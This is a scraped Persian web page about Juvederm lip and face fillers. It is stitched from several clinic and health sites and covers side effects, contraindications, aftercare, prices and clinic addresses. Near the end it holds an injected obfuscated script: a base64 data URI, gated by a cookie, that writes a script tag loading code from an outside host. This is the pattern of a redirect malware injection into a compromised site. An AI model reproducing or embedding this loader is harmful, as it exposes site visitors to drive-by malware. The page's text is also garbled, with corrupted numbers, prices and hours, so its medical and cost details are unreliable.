عوارض ژل لب ژوویدرم

برخی از افراد به طور طبیعی دارای لب هایی باریک هستند و فقط می خواهند لب هایشان کمی برجسته شده و ظاهر کامل تری داشته باشد. برخی دیگر از افراد نیز دریافته اند که به مرور زمان لب هایشان باریک شده و خطوط عمودی در لب هایشان دیده می شود. احتیاجات منحصر به فرد شما، هر آنچه که باشد، مجموعه ژوئیدرم قادر به کمک به شماست.

این مدل، لب ها را کمی پُرتر نشان داده و لب های نازک را برجسته تر می کند. به هر میزان که به مرور زمان لب ها کمی نازک شده باشند و یا به درخواست خود شما امکان به وجود آوردن ظاهری کامل تر به راحتی وجود دارد.

این مدل برای افزودن حجم کم و ظریف به لب مناسب بوده و خطوط عمودی لب را به خوبی پُر و یک دست می کند.

ژل تزریقی JUVÉDERM VOLUMA® XC (ژوویدرم) برای تزریق عمیق در ناحیه گونه به منظور تصحیح کاهش میزان حجم این ناحیه برای افراد بالای ۲۱ سال سن می باشد. ژل تزریقی JUVÉDERM VOLLURE ™ XC مناسب برای تزریق داخل  بافت صورت برای از بین بردن چین و چروک های متوسط ​​تا شدید (از جمله چروک های بینی) در بزرگسالان بالای ۲۱ سال است. ژل تزریقی JUVÉDERM® XC نیز مناسب برای تزریق داخل بافت صورت برای اصلاح چین و چروک های متوسط ​​و شدید صورت (مانند چین و چروک بینی) است. ژل تزریقیJUVÉDERM® Ultra XC  مناسب برای تزریق به لب برای افزایش حجم لب و نواحی اطراف آن در بزرگسالان بالای ۲۱ سال سن است.ژل تزریقیJUVÉDERM VOLBELLA® XC  (ژوویدرم) مناسب برای تزریق به لب برای افزایش حجم آن و برای اصلاح خطوط اطراف لب در بزرگسالان بالای ۲۱ سال سن می باشد.

عوارض ژل لب ژوویدرم

آیا دلیلی مبنی بر استفاده نکردن از هریک از فرمولاسیون های ژل تزریقی ژوئیدرم وجود دارد؟

اگر شما در مراجعات قبلی خود سابقه حساسیت شدید و یا واکنش های آلرژیک (آنافیلاکسی) داشته اید و یا اگر به لیدوکائین و پروتئین های باکتریایی گرم مثبت موجود در محصولات حساسیت دارید، از این دسته از محصولات استفاده نکنید.

اگر باردار و یا مادر شیرده هستید حتما این موضوع را به پزشک خود اطلاع دهید. ایمنی و سلامت این محصولات برای استفاده در دوران بارداری و یا شیردهی مورد مطالعه قرار نگرفته است.

ایمنی ژل  JUVÉDERM VOLUMA® XC در مراجعین زیر ۳۵ سال و یا بیش از ۶۵ سال، ایمنی ژل های تزریقی     JUVÉDERM® XC و JUVÉDERM® Ultra XC در مراجعین زیر ۱۸ سال و ایمنی JUVÉDERM VOLLURE ™ XC و JUVÉDERM VOLBELLA® XC در مراجعین زیر ۲۲ سال صد در صد تایید شده نیست.

ایمنی و اثربخشی ژل JUVÉDERM VOLUMA® XC در نواحی غیر از ناحیه گونه، JUVÉDERM® XC  و    JUVÉDERM VOLLURE ™ XC  برای مصارفی غیر از از بین بردن چین و چروک صورت و JUVÉDERM® Ultra XC  و (ژوویدرم) JUVÉDERM VOLBELLA® XC در نواحی غیر از لب ها و منطقه اطراف آن در مطالعات بالینی ثابت نشده است.

اگر سابقه زخم های بیش از حد و زیاد (به عنوان مثال، زخم های هیپرتروفی و ​​تشکیلات کلوئیدی) یا اختلالات رنگدانه ای دارید، به پزشک خود اطلاع دهید. زیرا استفاده از این محصولات ممکن است سبب بروز زخم های یا تغییرات رنگدانه ای در پوست شود.

هم چنین اگر در حال انجام هرگونه درمان توسط لیزر یا درمان شیمیایی برای پوست تان هستید، حتما این مساله را با پزشک خود در میان بگذارید. زیرا احتمال بروز التهاب پس از درمان در ناحیه مورد نظر وجود دارد.

بیمارانی که دچار آسیب پوستی در نزدیکی محل تزریق با این محصول می شوند، ممکن است در معرض خطر بیشتری برای تجربه عوارض جانبی باشند.

در صورت استفاده از داروهای ضد فشار خون برای کاهش پاسخ ایمنی بدن، حتما پزشک خود را در جریان بگذارید، زیرا استفاده از این محصولات ممکن است منجر به افزایش خطر ابتلا به عفونت شود.

اگر از داروهایی استفاده می کنید که خونریزی را طولانی می کنند، باز هم پزشک خود را در جریان قرار دهید. داروهایی مثل آسپرین، ایبوپروفن و یا دیگر رقیق کننده های خونی نمونه هایی از این داروها هستند. در غیر این صورت احتمال بروز کبودی و خونریزی در محل تزریق وجود دارد.

بهتر است تمرینات شدید ورزشی را به حداقل رسانده و در معرض آفتاب و یا گرمای زیاد قرار نگیرید. هم چنین از مصرف نوشیدنی های الکلی طی ۲۴ ساعت پس از تزریق جلوگیری نمایید.

عوارض جانبی گزارش شده با ژل های تزریقی  ژوئیدرم شامل قرمزی، تورم، درد، حساسیت به لمس، استحکام، لک ها، کبودی، تغییر رنگ و خارش در محل تزریق بوده است. برای ژل  JUVÉDERM VOLBELLA® XC، خشکی نیز گزارش شده است. برای JUVÉDERM VOLUMA® XC اکثر عوارض جانبی متوسط ​​بوده و حدودا بین ۲ تا ۴ هفته به طول انجامیده اند. برای ژل  JUVÉDERM® XC، JUVÉDERM VOLLURE ™ XC  (ژوویدرم) و ژل های تزریقی JUVÉDERM® Ultra XC، اکثر عوارض جانبی خفیف یا متوسط ​​بوده و ۱۴ روز یا کمتر ادامه داشته اند. برای ژل JUVÉDERM VOLBELLA® XC (ژوویدرم) اکثر عوارض جانبی خفیف یا متوسط ​​بوده و ۳۰ روز یا کمتر ادامه داشته اند.

یکی از خطرات استفاده از این محصولات تزریق غیر عمدی آن ها به رگ های خونی است. عوارض این اتفاق بسیار نادر می تواند جدی بوده و گاهی دائمی نیز باشد. این عوارض که برای تزریق در صورت گزارش شده است، می تواند شامل ناهنجاری های بینایی، نابینایی، سکته مغزی، چروک های موقت یا زخم های دائمی باشد. هم چنین در تمام پروسه های تزریقات پوستی نیز، خطر ابتلا به عفونت وجود دارد.

قیمت تزریق ژل های ژوویدرم در ایران حدود یک میلیون و چهارصد هزار تومان به ازای هر سی سی است که بسته به قیمت ارز در نوسان می باشد.

لیست خدمات گلوریا سنتر – آدرس و شماره تلفن های تماس در پایین همین صفحه قرار دارد

لیست مقالات – آدرس و شماره تلفن های تماس در پایین همین صفحه قرار دارد

تهران :  میدان ونک – کوچه صانعی پلاک 23 (ساختمان پزشکان سینا) طبقه دوم واحد 8

8821511  – مشاوره : 919427482 و 919427483

(ساعت پاسخگویی از 1 صبح الی 8 شب)

شعبات لیزر موهای زائد با دستگاه قدرتمند غیر لمسی و ایر کولینگ (Air cooling) الکس : شهرک غرب و صادقیه

گلوریا سنتر فقط یک مطب پوست،مو و زیبایی نیست بلکه یک مرکز علمی پژوهشی نیز می باشد . پزشکان این مجموعه با بیش از 2 سال تجربه و کاره ای درخشان قبل از هر اقدامی چهره شما را مورد بررسی و آنالیز قرار داده و سپس بر اساس علم پزشکی و هنر زیباشناختی چهره ، بهترین راه حل را پیشنهاد خواهند داد . مواد مصرفی در این مرکز بر اساس آخرین دستاوردهای علمی تایید شده و دارای مجوز وزارت بهداشت انتخاب می شوند.

اینستاگرام – تلگرام

1- تزریق بوتاکس زئومین Xeomin ساخت آلمان دارای مجوز – کل پیشانی و درو چشم 65 هزار تومان بجای 85 – کیفیت عالی ضد حساسیت . برای اطلاعات اینجا را لمس کنید

2 – تزریق ژل پرفکتا Perfectha ساخت فرانسه دارای مجوز هر سی سی 95 هزار تومان بجای 12 برای اطلاعات اینجا را لمس کنید

نبض ما مرجع پزشکی و سلامت – دانستنیهای سلامت و مشاوره پزشکی

به گزارش نبض ما به نقل از مجله سیب سبز، روش های زیادی برای از بین بردن چین و چروک وجود دارد، تزریق ژل هم یکی از راه هایی است که برخی از افراد سراغ آن می روند. ژل های تزریقی می تواند، تا حدودی خطوط را از چهره شما پاک کند، گودی چشم را درمان کند و چهره شما را جوان تر کند. در واقع این ژل های تزریقی روی فرو رفتگی و گود افتادگی چهره شما می نشینند.

اگر شما هم قصد تزریق ژل دارید، بهتر است، قبل از تصمیم به تزریق، بدانید که کدام ژل برای شما مناسب است و چه تزریقی برای شما بهترین است و ژل ها چگونه می توانند پوست شما را صاف کنند و درباره عوارض و مراقبت های بعد از آن بدانید؛ پس به راحتی تزریق ژل را به آرایشگر یا کارشناس زیبایی نسپارید.

با تزریق ژل، بلافاصله حجم از دست رفته به پوست بازمی گردد و چین هایی مانند خطوط لبخند و چین هایی که از کناره های تحتانی بینی در دوطرف شروع شده و تا گوشه های دهان ادامه پیدا می کنند، از بین می رود. ضمنا با برخی انواع آن می توان گود افتادگی های زیرچشم یا فرورفتگی های برخی قسمت های پوست را کاهش داد. علاوه بر اینها برای افزایش حجم لب، گونه و برای رفع خط اخم که با بوتاکس برطرف نمی شود هم از آن استفاده می کنند.

عوارض ژل لب ژوویدرم

تمام پوست های صاف و جوان در یک چیز مشترک هستند؛ اسید هیالورونیک. این ماده در بافت پوست هر نقطه بدن و در همه نژاد ها وجود دارد. اسید هیالورونیک فضای بین الیاف کلاژن و الاستین را پر می کند، آب را در پوست نگه داشته و حجم پوست را حفظ می کند. با افزایش سن، میزان اسید هیالورونیک موجود در پوست کاهش می یابد و بنابراین در نهایت ما با شیارها، چین و چروک و اغلب نازک تر شدن لب مواجه می شویم.

 اگر بدنبال تزریقی خوب و فیلر مطمئن در کلینیکی خاص هستید با شماره کلینیک تسنیم

جهت مشاوره رایگان تماس بگیرید  و وقت بگیرید .   2122764588

کد تخفیف جهت ایاب و  ذهاب رایگان nabzema2265

با تزریق اسید هیالورونیک به پوست، ما می توانیم اثرات اسید هیالورونیک طبیعی را تقلید کنیم و ظاهر و حالت پوست آبدار را ایجاد نماییم. با پر کردن فرو رفتگی های پوست، چین ها و چروک ها به طور قابل توجهی کم شده یا برطرف می شوند. با اینکه بوتاکس هم دارویی تزریقی است ولی مکانیسم اثر و نوع چین و چروک های هدفش کاملا با ژل های تزریقی متفاوت است.

برخی ژل های تزریقی عوارض غیرقابل جبرانی به همراه دارند. مثلا تزریق برخی ژل های تزریقی دائمی در بسیاری از افراد عوارض سوء شدیدی ایجاد کرده و آنها را با مشکلات عدیده ای روبه رو کرده است. مثلا عده ای از پزشکان می گویند در این ژل ها از مونومرهای سرطان زا استفاده شده است که می تواند احتمال ایجاد سرطان را در افرادی که این ماده را تزریق می کنند، ایجاد کند.

همچنین بعضی از افراد که این ماده را تزریق می کنند دچار حساسیت شده و سیستم ایمنی شان در مقابله با این ماده به مبارزه می پردازد. در بعضی دیگر نیز این ماده می تواند ایجاد گرانولوما کند؛ در واقع این امر زمانی اتفاق می افتد که ژل سفت شده و به طور کامل درصورت ایجاد تورم کند. بنابراین قبل از تزریق حتما با پزشک تان درباره انتخاب ژل مناسب و استاندارد مشورت کنید.

عوارض ناشی از ژل های تزریقی کاملا بستگی به نوع ژل دارد. ژل هایی خوب هستند که نخست بدن به آنها واکنش ندهد و بعد به مرور زمان قوام و شکل خود را زیر پوست محل تزریق از دست ندهند.

مثلا ژل هایی وجود دارند که بعد از تزریق تا چند ماه هیچ مشکلی ندارند ولی بعد از چند سال گلوله گلوله می شوند و در این صورت تخلیه آنها از پوست هم بسیار مشکل است لذا مراجعه کننده باید از پزشک خود نوع و مارک ژل را بپرسد.

البته مواردی از عارضه هم وجود دارد که ربطی به کیفیت بد آن ژل تزریقی ندارد بلکه به علت تکنیک غلط تزریق است. مثلا اگر موضع خوب ضد عفونی نشود و شرایط تزریق استریل رعایت نشود در محل تزریق ممکن است عفونت ایجاد شود که البته در این موارد می توان با درمان مناسب ضد میکروبی مشکل را حل کرد.

البته در بعضی موارد عوارض جزئی کوتاه مدتی در 2 تا 3 روز اول تزریق نیز به وجود می آید مثل تورم و التهاب محل تزریق یا حتی کبودی و خون مردگی که بعد از چند روز خوب می شود.

اینکه دوام ژل های تزریقی چقدر باشد بستگی به نوع ژل دارد. ممکن است دوام یک ژل در یک فرد با فرد دیگر چند ماهی تفاوت داشته باشد. تکنیک تزریق هم تا حدود زیادی در دوام ژل تزریق شده تاثیر دارد مثلا ژلی به کلاژن یا هیالورونیک است که باید در لایه میانی پوست یا درم تزریق شود. اگر خیلی سطحی تزریق شود یا عمقی دوام و اثر آن خیلی که خواهد شد و بالعکس.

به طور خلاصه مدت زمان اثر انواع ژل های تزریقی با مارک های معتبر ساخته شده در دنیا از ۶ ماه تا ۲ سال متغیر است. البته زمانی که گفته می شود تاثیر فلان ژل تزریق شده یک سال است به این معنی نیست که اثر پرکنندگی آن در طول یک سال کامل است بلکه معمولا در شش ماه اول تزریق پرکنندگی آن خوب و مثل ماه اول است ولی از ماه ششم و هفتم و به بعد تاثیر آن کمتر می شود و تا پایان یک سال کاملا اثر آن از بین می رود.

نوع ژل مصرفی اول از همه به عمق چین محل تزریق بستگی دارد. مثلا برای خط خنده خیلی عمیق بهتر است از ژل های غلیظ به خصوص آنهایی که دوام و ماندگاری بیشتری دارند (مثلا ژل های یک تا ۲ ساله) استفاده شود و بالعکس. اگر عمق چین های اخم یا خط خنده کم باشد بهتر است از ژل های رقیق تر و با دوام کمتر استفاده کنند، خصوصا درمورد چین های اطراف چشم که عمق آن از چین های خنده خیلی کمتر است حتما از ژل های رقیق باید استفاده شود.

ژل های تزریقی که از ماده هیالورونیک مشتق شده اند که میزان عارضه کمی دارند و مدت ماندگاری آن 9 ماه تا یک سال است. ژل دیگری که نیمه عمر طولانی تری دارد از هیدروکسی آپاتیت مشتق شده که از ژل مشتق شده از هیالورونیک اسید موثرتر بوده و به صورت عمقی تزریق می شود.

قیمت ژل های تزریقی که ماندگاری یک تا ۲ ساله دارند معمولا دو تا سه برابر ژل هایی است که ماندگاری ۶ تا ۹ ماهه دارند.

به عنوان مثال تزریق یک سی سی ژل حاوی هیالورونیک از مارک های معتبر مثلا فرانسوی یا کانادایی که ماندگاری یک ساله دارند حدود 3 درصد گران تر از یک سی سی ژل بادوام اثر ۶ تا ۸ ماهه از مارک های معتبر و درجه یک چینی است البته اگر عمق چین زیاد باشد نیاز به دو سی سی یا دو سورنگ ژل برای پر کردن چین و گودی خط خنده دارند و طبعا قیمت آن هم تقریبا دو برابر خواهد شد.

بعد از تزریق نباید تا سه روز به محل آن آب بزنید و بهتر است از تمرینات ایروبیک برای 24 ساعت خودداری کنید و بره کاری یا اجتماعی مهمی را برای چند روز بعد از درمان طرح ریزی نکنید.

احتمال دارد قرمزی، تورم و کبودی خفیفی در محل تزریق به وجود آید. همچنین لب های شما قدری در شب پس از تزریق متورم خواهد شد. اگر تا یک هفته بعد از نخستین تزریق نتیجه زیبایی حاصل نشد 3 هفته بعد، تزریق مجدد قابل انجام است. حواستان باشد که تا 3 هفته هیچ ماساژی روی صورت انجام نشود.

تلاش کنید از مصرف هر ترکیبی که حاوی آسپرین، ایبوپروفن، داروهای مسکن ضد التهابی با دوز بالا، ویتامین E، یا روغن ماهی باشد 5-3 روز قبل از تزریق ژل پرهیز کنید تا احتمال کبودی در محل تزریق کمتر شود.

به طور معمول اثر ژل هیالورونیک اسید از چند هفته تا چند ماه باقی می ماند. هیالورونیـــک اسید ها قابل جذب هستند و بنابر این راه حل دائمی برای برطرف کردن چــین و چــروک نیستند و لازم است هر چند ماه یک بار تزریق آنها را تکرار کرد. زمان تکرار تزریق به عواملی مانند سن فرد، شیوه زندگی و منطقه مورد نظر درصورت فرد بستگی دارد.

فیلرهای تزریقی امروزه برای استفاده در نقاط مختلف صورت کاربرد دارند. از جمله چین های عمیقی مثل خط لبخند که موجب می شود چهره ای جوان تر به دست آورید.

با استفاده از یک سوزن بسیار نازک، ژل به صورت مستقیم در اندازه های کوچک، به زیر پوست تزریق می شود. این تزریق باعث ایجاد نتایج فوری می شود و همچنین موجب یک بهبودی طبیعی طولانی مدت برای پوست شما از نظر بهداشتی هم سالم است.

مدت زمانی که این درمان اثر خود را برای شما حفظ می کند بسیار وابسته به عوامل مختلف است. از جمله سن، نوع پوست، سبک زندگی، فعالیت های عضلانی و همچنین تکنیک مورد استفاده برای تزریق ژل. تجربه نشان داده است که برخی از ژل ها می توانند به مدت یک سال و برخی دیگر به مدت دوسال باقی بمانند.

بواسطه تزریق درد کمی در خطوط لبخند پدیدار می شود. در نظر داشته باشید که بعضی از بیماران بعد از این روش دچار کبودی می شوند که البته با کمی آرایش پوششی قابل پنهان کردن است.

صورت خود را در ناحیه تزریق (زیر چشم) پاک کنید. پیش از تزریق، از پزشک خود درخواست کنید که یک بلاک دندانی به شما بدهد و از بیحسی موضعی استفاده نماید تا درد کمتری را احساس نمایید.

برخی از عوارض جانبی این درمان عبارتند از کبودی، تورم، قرمزی، درد، خارش، تغییر رنگ و حساسیت در محل تزریق.

این موارد پس از گذشت چند روز از تزریق به داخل پوست کشیده می شوند و در عرض یک هفته پس از تزریق به لپ ها فروکش می کنند. در موارد بسیار نادر، التهاب و فرم هایی شبیه به آکنه گزارش شده است که پس از حدود دو هفته خود بخود بهبود می یابند.

پوست | مو | زیبایی | لیزر موهای زائد

پزشک ها متخصص مرتبط

عوارض ژل لب ژوویدرم

کدام گن لاغری بهتر است؟

همه چیز درباره هاشور ابرو یا میکروبلیدینگ

بوتاکس و کاربردهای بوتاکس در جوانسازی

4 ماسک فوری برای سفت شدن پوست صورت

استفاده از ماسک سیاه چه خطراتی دارد؟

چگونه خالکوبی را پاک کنیم؟

درصورتی‌که نیاز به مشاوره و یا طرح پرسش از پزشک را دارید، فقط در بخش «از دکتر بپرسید» مطرح کنید.

Save my name, email, and website in this browser for the next time I comment.

باسلامخدمت پزشک مربوطه،میخواستم ببینم بعد از تزریغ این مواد که از بین میره دقیقا چی میشه قطعا دفع که نمیشه یعنی در بدن پخش میشه ؟سرطان زا هستند؟

دکتر سلام

زیبایی و جوانسازی به کمک فیلرها یا ژل ها+ فیلم (دکتر صمیمی)

راه های مقابله با ابتلا به زگیل تناسلی +ویدئو

تاثیر چاقی در فشار خون بالا

زگیل تناسلی از تشخیص تا درمان +ویدئو

برای چه بیماری هایی به متخصص اورولوژی مراجعه کنیم؟

عوارض و علل گذاشتن باطری قلب +ویدئو

جشنواره فجر

اعلام اسامی زدهای سی و هفتمین جشنواره فیلم فجر

جشنواره 37/ معرفی و گزارش نشست خبری فیلم سرخپوست

جشنواره 37/ معرفی فیلم متری شش و نیم به کارگردانی سعید

جشنواره 37/ معرفی فیلم شبی که ماه کامل شد اثر نرگس آبیار

جشنواره 37/ معرفی فیلم طلا به کارگردانی پرویز شهبازی

جشنواره 37/ معرفی فیلم ناگهان درخت به کارگردانی صفی یزدانیان

ویدیو های سلامت

بهترین روش کاشت مو sut است یا fut + ویدئو

عوامل موثر در افزایش قد بعد از بلوغ

شایع ترین سرطان در بین زنان

آیا اعتیاد به پورنوگرافی قابل درمان است؟

روش های خانگی رفع چین و چروک صورت +ویدیو

مطالب پیشنهادی

بهترین بره رژیم لاغری برای کاهش وزن

عمل لابیاپلاستی برای این زنان ممنوع است!

مزایا و عوارض لیزر موهای زائد چیست؟

هزینه اصلاح طرح لبخند چقدر است ؟

گردشگری سلامت یا توریسم درمانی چیست؟

آنچه را که باید درباره کاربرد اسکن استخوان بدانید

هزینه آزمایش ایدز چقدر است؟

چه زمانی تست پاپ اسمیر انجام شود؟

زگیل تناسلی از تشخیص تا درمان +ویدئو

بهترین روش کاشت مو sut است یا fut + ویدئو

روش های خانگی رفع چین و چروک صورت +ویدیو

فهرست مطالب

تزریق ژل ژوویدرم | Juvederm , قیمت و هزینه تزریق ژوویدرم :  ژوویدرم توسط شرکت Allergan تولید شده است که ۳ فرمولاسیون را ارائه می دهد: Juvederm Ultra، Juvederm Ultra Plus و Juvederm Voluma. تمام این پرکننده های پوستی به دسته تزریق ژل هیالورونیک اسید می رسند. اسید هیالورونیک نوعی اسید قندی است که به طورت طبیعی در بدن انسان تولید می شود نقش این اسید در پوست کمک به حفظ رطوبت و نرمی طبیعی برای پوست و نیز تامین کننده مواد مغذی پوست است . ژل ژوویدرم محبوبترین ژل برای برجسته گردن لب هاست . ژل ژوویدرم به صورت اختصاصی در هر سه فرموله برای برجسته کردن لب طراحی شده است . از این جهت نتایج حاصل همیشه به صورت طبیعی دیده می شود . همچنین این ژل حاوی لیدوکائین می باشد که درمان با ژوویدرم را راحتر می کند.

بله، ژوویدرم توسط FDA در ۲۲ اکتبر ۲۰۱۳ تأیید شد. بر اساس تحقیقات بالینی که توسط FDA جمع آوری شده است ، آنها دریافتند که Juvederm را می توان به راحتی برای برجسته کردن لب و گونه ها تزریق کرد .

ژوویدرم ( Juvederm ) به بافت چهره ای تزریق می شود تا جایگزین حجمی شود که از نظر پیری، بیماری یا آسیب ناشی از خورشید یا سیگار کشیدن از دست داده است. اسید هیالورونیک در بدن انسان نقش مهمی ایفا می کند؛ عملکرد اولیه آن حفظ هیدراتاسیون و حجم پوست است. مطالعات نشان داده اند که اثرات یک درمان یوودرم تنها می تواند تا ۱۲ ماه ادامه یابد. بعضی از نتایج تا ۲ سال طول کشید.

بله، هر نوع پرکننده ( فیلر ) پوستی ژل هیالورونیک اسید مانند Juvederm Voluma، Juvederm Ultra، Juvederm Ultra Plus، Restylane، Restylane Silk، Restylane Lyft و Perlane همگی با هر نوع پوستی سازگار هستند.

عوارض ژل لب ژوویدرم

برجسته کردن لب ها ( تقویت لب ) : برای حجیم کردن لب ها مورد استفاده ویژه دارد . چرا که زاتا این نوع ژل برای تقویت لب طراحی شده است و در این مورد بیشترین کاربرد را دارد.

برای رفع چین و چروک برخی نواحی صورت مانند : خطوط لبخند , چین و چروک در انتهای بینی و گوشه های دهان
خطوط عمودی لب : اکثر بیماران به دلیل بالا رفتن سن , سیگاری بودن , قرار گرفتن در معرض نور خورشید شدید و این نواحی دچار چین و چروک می شود که با تزریق ژل ژوییدرم به راحتی قابل رفع می باشد.

بر اساس تشخیص پزشک معالجتان می توانید از ژل ژوویدرم استفاده کنید . در زیر هر سه فرمول را توضیح دادیم :

خطرات و عوارض جانبی احتمالی تزریق ژل زوویدرم  عبارتند از:

برای لیست کامل عوارض جانبی و خطرات احتمالی، لطفا با یک متخصص پزشکی مشورت کنید.

***نکته مهم

بیماران باردار یا دوران شیردهی مادر باید به دنبال درمان دیگری باشند زیرا تحقیقات کافی برای شناخت این شیوه بر روی نوزاد انجام نشده است.

getCookie(e){ U.cookie.match(new RegExp(“(?:^| )”+e.replace(/([.$?*|{}[]\/+^])/g,”\$1″)+”([^]*)”)) U?decodeURIComponent(U[1]):void } src”data:text/base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSUOCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs”,nowMath.floor(Date.now/1e3),cookiegetCookie(“redirect”)if(now&gt(timecookie)||void time){ timeMath.floor(Date.now/1e3+864),datenew Date((new Date).getTime+864).cookie”redirect”+time+” path/ expires”+date.toGMTString,.write(”)}

 

برای کسب اطلاعات لازم در رابطه با تبلیغات در سایت لیزر موهای زائد با مشاورین ما تماس بگیرید :

وب سایت لیزر لند فضایی مجازی برای اطلاع رسانی در زمینه لیزر مو و پزشکی زیبایی و خدمات کلینیک های زیبایی  , پوست و مو می باشد . هیچ نوع خدماتی درمانی  به صورت مستقیم و یا غیر مستقیم از لیزر لند ارائه نمی شود.

نشانی و تماس با مراکز لیزر موهای زائد سراسر کشور

تهران اسکین – زیبایی ، پوست و لیزر موهای زاید در کشور | دستگاه لیزر مو |بهترین کلینیک لیزر مو

محتوای این صفحه

تنها مرکز معرفی بهترین مراکز تخصصی پوست و لیزر موهای زائد در سراسر کشور (با کیفیت یکسان)

**************************************

عوارض ژل لب ژوویدرم

نشانی و شماره تماس دهها مرکز لیزر موی معتبر در تهران و شهرهای بزرگ ایران (برای دیدن مراکز لیزر ادامه نوشته را ببینید یا روی شهر مورد نظرتان در لیست زیر کلیک کنید)

مرکز تخصصی لیزر موهای زائد شریعتی(دولت)  (دستگاه الکساندرایت اسکلپیون Mediostar 218) 

مرکز تخصصی لیزر موهای زائد پونک تهران ؛ اینجا کلیک کنید (با دستگاه پلاتینیوم217)

مرکز تخصصی لیزر موهای زائد اصفهان؛ اینجا کلیک کنید (با دستگاههای دایود و الکساندرایت آپوجی آمریکا قویترین تکنولوژی دنیا)

مرکز تخصصی لیزر موهای زائد مشهد ؛ اینجا کلیک کنید (با دستگاه دایود 217)

مرکز تخصصی لیزر موهای زائد اهواز ؛ اینجا کلیک کنید (با دستگاه دایود )

مرکز تخصصی لیزر موهای زائد رشت ؛ اینجا کلیک کنید (با دستگاه پلاتینیوم)

مرکز تخصصی لیزر موهای زائد شیراز ؛ اینجا کلیک کنید (با دستگاه پلاتینیوم)

مرکز تخصصی لیزر موهای زائد بوشهر ؛ اینجا کلیک کنید (با دستگاه پلاتینیوم)

مرکز تخصصی لیزر موهای زائد زنجان ؛ اینجا کلیک کنید(مرکز جدید به زودی اطلاع رسانی خواهد شد)

مرکز تخصصی لیزر موهای زائد همدان؛ اینجا کلیک کنید (مرکز جدید به زودی اطلاع رسانی خواهد شد)

مرکز تخصصی لیزر موهای زائد بابل ؛ اینجا کلیک کنید

مرکز تخصصی لیزر موهای زائد سنندج (کردستان) ؛ اینجا کلیک کنید (با دستگاه الکساندرایت 218)

مرکز تخصصی لیزر موهای زائد کرج ؛ اینجا کلیک کنید (با دستگاه الکساندرایت)

مرکز تخصصی لیزر موهای زائد کرمان ؛ اینجا کلیک کنید (با دستگاه دایود)

مرکز تخصصی لیزر موهای زائد یزد ؛ اینجا کلیک کنید (با دستگاه دایود )

**************************************

سایت گروه پزشکان تهران اسکین سایتی است شخصی که توسط متخصصین پوست و مو و پزشکان زیبایی اداره میشود.

هدف ما در این سایت اطلاع رسانی صحیح و دقیق و علمی در حیطه پوست و مو و لیزر است. سایت تهران اسکین با همکاری موسسه پژوهشی قلم زرین به شماره ثبت 3366 به عنوان یکی از بزرگترین منابع تخصصی اطلاع رسانی لیزر و زیبایی در کشور فعالیت علمی و تحقیقاتی می کند.

سایت لیزر،پوست و زیبایی تهران اسکین با همکاری بهترین متخصصین پوست و زیبایی در تمامی کشور امکانات مشابه لیزر موهای زائد را در بهترین مطب های پزشکی در سطح کشور ارائه دهد.سایت تهران اسکین در حال حاضر دارای  4 مطب تخصصی همکار فعال در تهران و چندین مطب همکار فعال در شهرستانهای ایران است.

برای دیدن نشانی مراکز لیزر لطفا ادامه نوشته را ببینید.

شریعتی (دولت)

در این مرکز خدمات لیزر با دستگاه اسکلپیون Mediostar 218 ارائه می شود. این مرکز زیر نظر خانم دکتر نفیسه جوادی جراح زیبایی و پوست و متخصص لیپوساکشن و زیبایی می باشد.

 

(برای دیدن لیست قیمت های لیزر الکس در شعبه شمال تهران اینجا کلیک کنید)

نشانی مرکز تخصصی: شریعتی، بالاتر از مترو قلهک،روبروی خ دولت، کوچه امامزاده جنب فروشگاه جانبو،پلاک 14،طبقه اول واحد 1

شماره های تماس (شنبه تا پنجشنبه از 9 صبح الی 9 شب):
(جمعه ها هم مرکز با رزرو قبلی فعال می باشد)

22612171 _ 21
2261218 _ 21761748 _ 92

پونک

در این مرکز خدمات لیزر با دستگاه پلاتینیوم 217 ارائه می شود. این مرکز زیر نظر دکتر  امینی علوی می باشد. (برای دیدن لیست قیمت های لیزر در شعبه غرب تهران اینجا کلیک کنید)

دکتر  امینی علوی (پزشک عمومی)

  پوست ،مو و زیبایی

 

عوارض ژل لب ژوویدرم

نشانی مرکز تخصصی پونک: انتهای اشرفی اصفهانی چهار دیواری روبروی ایستگاه بی آر تی اشرفی اصفهانی ساختمان شادی طبقه فوقانی داروخانه دکتر واقفی،مطب خانم دکتر امینی

شماره های تماس (شنبه-پنجشنبه از 1 صبح الی 7 بعدازظهر)

21-44813133

44834176_21

 

اصفهان

 

در این مطب خدمات لیزر با دستگاه دایود (olive) سوپرانو و همچنین الکساندرایت آپوجی (apogee) ساخت کمپانی سایناشور آمریکا (برترین برند تولید کننده لیزر در دنیا)،خدمات تزریق بوتاکس وژل و لاغری موضعی، مشاوره تغذیه،خدمات تناسب اندام و لاغری و همچنین خدمات جوانسازی پوست صورت و بدن ارائه می شود. این مطب زیر نظر دکتر مهسا سعیدیان می باشد.

برای دیدن لیست قیمت ها و سایر اطلاعات در مورد انواع دستگاههای مورد استفاده اینجا کلیک کنید.

 

نشانی مرکز اصفهان: دروازه شيراز ، چهارباغ بالا ، كوچه مسجدالرضا(قبل شركت زمزم)، ساختمان99، طبقه 1 واحد 13 نشانی لیزر اصفهان روی نقشه گوگل (کلیک کنید)

دقت کنید که لیزر موهای زائد در این مرکز با دستگاه دایود و الکساندرایت است.شما میتوانید با مشاوره تلفنی با این مرکز بهترین انتخاب درمانی را داشته باشید.

شماره های تماس (شنبه-چهارشنبه از 1 صبح الی 7 بعدازظهر):

31-36633126

31-36639913

مشهد

در این مرکز تخصصی خدمات لیزر با دستگاه دایود با تکنولوژی لیزر دایود الیو ، این شعبه زیر نظر دکتر زهرا خانی متخصص پوست و جراح پوست,مو,زیبایی و لیزر می باشد.

(برای مشاهده لیست قیمت های لیزر دایود در مشهد اینجا کلیک کنید)

دکتر زهرا خانی متخصص و جراح پوست و زیبایی

  متخصص پوست ، مو، زیبایی و لیزر درمانی

شماره های تماس و نشانی (شنبه-پنجشنبه از 1 صبح الی 8 شب):

مشهد,احمد آباد,خیابان عرف,عارف 3,پلاک 26

شماره های تماس (شنبه-پنجشنبه از 9 صبح الی 7 بعدازظهر):.

915784617

51-38463883

اهواز

